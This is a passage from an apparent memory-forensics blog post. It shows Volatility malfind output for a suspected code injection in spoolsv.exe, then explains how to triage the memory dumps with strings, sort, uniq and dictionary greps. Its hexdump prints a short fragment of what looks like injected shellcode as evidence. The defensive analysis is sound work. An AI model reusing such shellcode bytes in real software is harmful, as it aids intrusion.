class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xdc003f 2c <span class="Apple-converted-space"> </span>DB 0x2c</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span><br /></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Hexdump:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0x00dc0000<span class="Apple-converted-space"> </span>fc 48 89 ce 48 81 ec 00 20 00 00 48 83 e4 f0 e8 <span class="Apple-converted-space"> </span>.H..H......H....</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0x00dc0010<span class="Apple-converted-space"> </span>cc 00 00 00 41 51 41 50 52 51 56 48 31 d2 65 48 <span class="Apple-converted-space"> </span>....AQAPRQVH1.eH</span></p><p 
class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0x00dc0020<span class="Apple-converted-space"> </span>8b 52 60 48 8b 52 18 48 8b 52 20 48 8b 72 50 48 <span class="Apple-converted-space"> </span>.R`H.R.H.R.H.rPH</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0x00dc0030<span class="Apple-converted-space"> </span>0f b7 4a 4a 4d 31 c9 48 31 c0 ac 3c 61 7c 02 2c <span class="Apple-converted-space"> </span>..JJM1.H1..&lt;a|.,</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span><br /></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span><br /></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Process: spoolsv.exe, Pid: 1120</span></p><p class="p1"
style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">VadTag: VadS, Protection: PAGE_EXECUTE_READWRITE, Flags: PrivateMemory: 1, Protection: 6</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span><br /></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Raw data at address 0xf093650000: 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000e8000000</span></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span><br /></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">Disassembly:</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: 
normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xf093650000 4d5a <span class="Apple-converted-space"> </span>POP R10</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xf093650002 90 <span class="Apple-converted-space"> </span>NOP</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xf093650003 0003 <span class="Apple-converted-space"> </span>ADD [RBX], AL</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xf093650005 0000 <span class="Apple-converted-space"> </span>ADD [RAX], AL</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xf093650007 000400 <span class="Apple-converted-space"> </span>ADD [RAX+RAX], AL</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; 
font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xf09365000a 0000 <span class="Apple-converted-space"> </span>ADD [RAX], AL</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">0xf09365000c ff <span class="Apple-converted-space"> </span>DB 0xff</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">...</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; widows: 2;"><span style="background-color: white;"><font><font face="inherit"><span style="font-variant-ligatures: no-common-ligatures;">Above we see 
the same data as before, plus a </span></font><span style="font-variant-ligatures: no-common-ligatures;">disassembly and</span><span style="font-variant-ligatures: no-common-ligatures;"><font face="inherit"> hexdump of 64 bytes of the suspect memory regions. Note the use of the </font><font face="courier">--dumpdir</font><font face="inherit"> argument, which will create dump files containing the suspect memory ranges that can be analyzed further.</font></span></font></span></div><h2 style="orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; widows: 2;"><span style="background-color: white;"><font><span style="font-variant-ligatures: no-common-ligatures;"><font face="inherit">Triaging malfind's dumps</font></span></font></span></h2><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">A capable reverse engineer would likely load </font><font face="courier">malfind's</font><font face="inherit"> dumps in something like IDA Pro and reach sound conclusions about the capabilities represented by the contents of these suspect memory regions.
</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">davehull@scrutiny:~/res/malfind_dump$ ls -la</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">total 2968</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">drwxrwxr-x 2 davehull davehull<span class="Apple-converted-space"> </span>4096 Jul 21 13:59 .</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 
0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">drwxrwxr-x 3 davehull davehull<span class="Apple-converted-space"> </span>4096 Jul 21 14:01 ..</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">-rw-rw-r-- 1 davehull davehull 1191935 Jul 19 21:39 process.0xfffffa8005138980.0xdc0000.dmp</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">-rw-rw-r-- 1 davehull davehull<span class="Apple-converted-space"> </span>155647 Jul 19 21:39 process.0xfffffa8005138980.0xf093650000.dmp</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">-rw-rw-r-- 1 davehull davehull<span class="Apple-converted-space"> </span>450559 Jul 19 21:39 process.0xfffffa8005138980.0xf093c70000.dmp</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">-rw-rw-r-- 1 davehull 
davehull 1232895 Jul 19 21:39 process.0xfffffa8005138980.0xf093d40000.dmp</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">davehull@scrutiny:~/res/malfind_dump$</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><font style="font-variant-ligatures: no-common-ligatures;">I've never considered myself an expert at RE (or anything, really), but have dabbled on the edges. 
An easy place to start for quickly triaging is with the </font><font face="courier" style="font-variant-ligatures: no-common-ligatures;">strings</font><font style="font-variant-ligatures: no-common-ligatures;"> utility.</font></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><font style="font-variant-ligatures: no-common-ligatures;"><br /></font></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><font size="2" style="font-variant-ligatures: no-common-ligatures;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-ligatures: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">strings -a -t d process.0xfffffa8005138980.0xdc0000.dmp > process.0xfffffa8005138980.0xdc0000.dmp.strings</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-ligatures: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">strings -a -t d -e l process.0xfffffa8005138980.0xdc0000.dmp >> process.0xfffffa8005138980.0xdc0000.dmp.strings</span></p></font></div><div 
style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">The above commands extract ASCII and Unicode strings from the first of </font><font face="courier">malfind's</font><font face="inherit"> dumps and include a first column indicating the number of bytes into the file where the given string begins; this can be useful if you want to examine the string in context.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style:
initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">cat process.0xfffffa8005138980.0xdc0000.dmp.strings | awk '{$1="";print}'| sort | uniq -c | sort -g > process.0xfffffa8005138980.0xdc0000.dmp.strings.lfo</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">This command drops the offset column with </font><font face="courier">awk</font><font face="inherit">, sorts the strings (</font><font face="courier">uniq</font><font face="inherit"> only collapses adjacent duplicates, so the sort has to come first), passes them to the </font><font face="courier">uniq</font><font face="inherit"> utility with the </font><font face="courier">-c</font><font face="inherit"> argument to count the occurrences of each distinct string, then passes the result to the </font><font face="courier">sort</font><font face="inherit"> command again with </font><font face="courier">-g</font><font face="inherit"> so that the least frequent strings come first. 
This is done as a data reduction measure; judging by the line counts below, it cuts the number of lines roughly in half. We can further reduce this by grepping through the strings with a good wordlist.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">cp /usr/share/dict/american-english .</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: 
no-common-ligatures;"><font size="2">strings american-english | grep -v "'" > american-english.1</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">strings -n4 american-english.1 > american-english</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">The steps above copy the system's American English dictionary to the current directory, remove the lines containing apostrophes, and then use </font><font face="courier">strings -n4</font><font face="inherit"> as a quick way to drop words shorter than four characters, which matters because </font><font face="courier">grep -F</font><font face="inherit"> matches substrings and three-letter words would match almost every line. 
Now that we have a reasonably good list of words, we can grep through our strings output for matches:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">grep -iFf american-english process.0xfffffa8005138980.0xdc0000.dmp.strings.lfo > process.0xfffffa8005138980.0xdc0000.dmp.strings.lfo.words</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; 
font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Again, this is purely about data reduction. After this step, we're down to less than 4K words from nearly 17K strings at the start:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">davehull@scrutiny:~/res/malfind_dump$ wc -l *strings*</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: 
no-common-ligatures;"><font size="2"><span class="Apple-converted-space"> </span>16942 process.0xfffffa8005138980.0xdc0000.dmp.strings</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2"><span class="Apple-converted-space"> </span>8540 process.0xfffffa8005138980.0xdc0000.dmp.strings.lfo</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2"><span class="Apple-converted-space"> </span>3797 process.0xfffffa8005138980.0xdc0000.dmp.strings.lfo.words</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><br /></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;">Here are a few interesting strings from the <font face="courier">.words</font> file:</span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; 
font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><br /></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">davehull@scrutiny:~/res/malfind_dump$ grep Create *.words</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>CreateEventA</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><span class="Apple-converted-space"> </span>1<span class="Apple-converted-space"> </span>CreateEventExW</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; 
